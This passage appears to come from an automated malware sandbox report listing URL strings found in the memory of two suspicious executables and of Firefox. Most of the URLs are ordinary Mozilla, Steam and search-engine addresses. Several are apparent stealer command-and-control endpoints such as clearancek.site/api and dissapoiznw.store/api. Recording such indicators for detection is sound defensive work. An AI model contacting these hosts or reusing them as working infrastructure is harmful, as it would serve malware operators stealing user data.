Source: 7e96f85771.exe, 00000008.00000002.3201117292.00000000299D1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: 7e96f85771.exe, 00000008.00000002.3201117292.00000000299D1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: f84005b97f.exe, 00000009.00000003.2945007725.0000000000F39000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000F49000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000002.2949821023.0000000000F49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: firefox.exe, 00000017.00000002.3091500089.000002881F8AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: f84005b97f.exe, 00000009.00000003.2945007725.0000000000F39000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000F49000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000002.2949821023.0000000000F49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: 7e96f85771.exe, 00000008.00000002.3168952289.0000000001482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 7e96f85771.exe, 00000008.00000002.3168952289.0000000001482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 7e96f85771.exe, 00000008.00000002.3168952289.0000000001482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: f84005b97f.exe, 00000009.00000002.2949821023.0000000000F49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: f84005b97f.exe, 00000009.00000002.2949626105.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000002.2949821023.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2946508020.0000000000F1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clearancek.site/
Source: f84005b97f.exe, 00000009.00000002.2949626105.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clearancek.site/e
Source: f84005b97f.exe, 00000009.00000002.2949746243.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clearancek.site:443/apibcryptPrimitives.dllR
Source: f84005b97f.exe, 00000009.00000002.2949821023.0000000000F49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: f84005b97f.exe, 00000007.00000003.2823560713.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000002.2826347227.00000000014DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/communit
Source: f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=ljhW-PbGuX
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&amp;l=english&am
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
Source: f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/fatalerror.css?v=wctRWaBvNt2z&amp;l=e
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&amp;l=engli
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1&amp;
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&amp;l=en
Source: f84005b97f.exe, 00000007.00000003.2813057343.0000000001437000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000003.2823560713.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000002.2826347227.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: f84005b97f.exe, 00000007.00000003.2823560713.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000002.2826347227.00000000014DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLo
Source: f84005b97f.exe, 00000007.00000003.2813057343.0000000001437000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: f84005b97f.exe, 00000007.00000003.2823560713.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000002.2826347227.00000000014DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/
Source: f84005b97f.exe, 00000007.00000003.2823560713.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000002.2826347227.00000000014DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/lib0
Source: f84005b97f.exe, 00000007.00000003.2813057343.0000000001437000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: f84005b97f.exe, 00000007.00000003.2823560713.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000002.2826347227.00000000014DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.
Source: f84005b97f.exe, 00000007.00000003.2813057343.0000000001437000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=W9BX
Source: f84005b97f.exe, 00000007.00000003.2813057343.0000000001437000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=bOP7RorZq4_W&amp;l=englis
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=UuGFpt56D9L4&amp;l=
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engli
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=KkhJqW2NGKiM&amp;l=engli
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp;
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=qYlgdgWOD4Ng&amp
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=engl
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Ff_1prscqzeu&amp;
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
Source: firefox.exe, 00000017.00000003.2983132390.000002882376F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2982268821.0000028823500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2982443745.000002882371D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3112181338.0000028823900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000003.2982699498.0000028823738000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2982871988.0000028823753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3163888580.000002882BA1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2983357091.000002882378A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F87B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3149714295.000002882B61F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: 7e96f85771.exe, 00000008.00000002.3201117292.00000000299D1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 7e96f85771.exe, 00000008.00000002.3201117292.00000000299D1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: firefox.exe, 00000017.00000002.3143683785.000002882B2A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 00000017.00000002.3143683785.000002882B2A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/
Source: firefox.exe, 00000017.00000002.3143683785.000002882B2A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3089829933.000002881F2C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3142479922.000002882B153000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3119588541.0000028824503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3100093809.00000288230EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 00000017.00000002.3085847545.0000028813611000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3085847545.0000028813630000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 00000017.00000002.3093750856.0000028820AF0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabPlease
Source: firefox.exe, 00000017.00000002.3093750856.0000028820AF0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureOffscreenCanvas.toBlob()
Source: firefox.exe, 00000017.00000002.3093750856.0000028820AF0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequest
Source: firefox.exe, 00000017.00000002.3093750856.0000028820AF0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureInstallTrigger.install()
Source: firefox.exe, 00000017.00000002.3093750856.0000028820AF0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryptiondocument.requestSto
Source: firefox.exe, 00000017.00000002.3093750856.0000028820AF0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingTrying
Source: f84005b97f.exe, 00000009.00000002.2949746243.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dissapoiznw.store:443/api
Source: firefox.exe, 00000017.00000002.3180688170.000022DAD3C04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 00000017.00000002.3163888580.000002882BAB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2982268821.0000028823500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2982443745.000002882371D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3112181338.0000028823900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000003.2982699498.0000028823738000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3173331545.000002882DF05000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2982871988.0000028823753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3180941837.000023F979304000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3119588541.0000028824503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: firefox.exe, 00000017.00000002.3163888580.000002882BAB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3117080621.0000028824319000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?t=ffab&q=
Source: 7e96f85771.exe, 00000008.00000002.3168952289.0000000001482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 7e96f85771.exe, 00000008.00000002.3168952289.0000000001482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 7e96f85771.exe, 00000008.00000002.3168952289.0000000001482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3112181338.0000028823900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/y
Source: f84005b97f.exe, 00000009.00000002.2949746243.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://eaglepawnoy.store:443/api&.sg
Source: firefox.exe, 00000017.00000002.3180688170.000022DAD3C04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ebay.comP
Source: firefox.exe, 00000017.00000002.3093750856.0000028820AF0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/initMouseEvent()
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3149714295.000002882B685000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3036113479.000002882D119000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3039351841.000002882D8E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/d8e772fe-4909-4f05-9f9
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839
Source: firefox.exe, 00000017.00000002.3108949282.0000028823403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3090755070.000002881F7AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3181547624.0000307B45B04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3090755070.000002881F7D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com
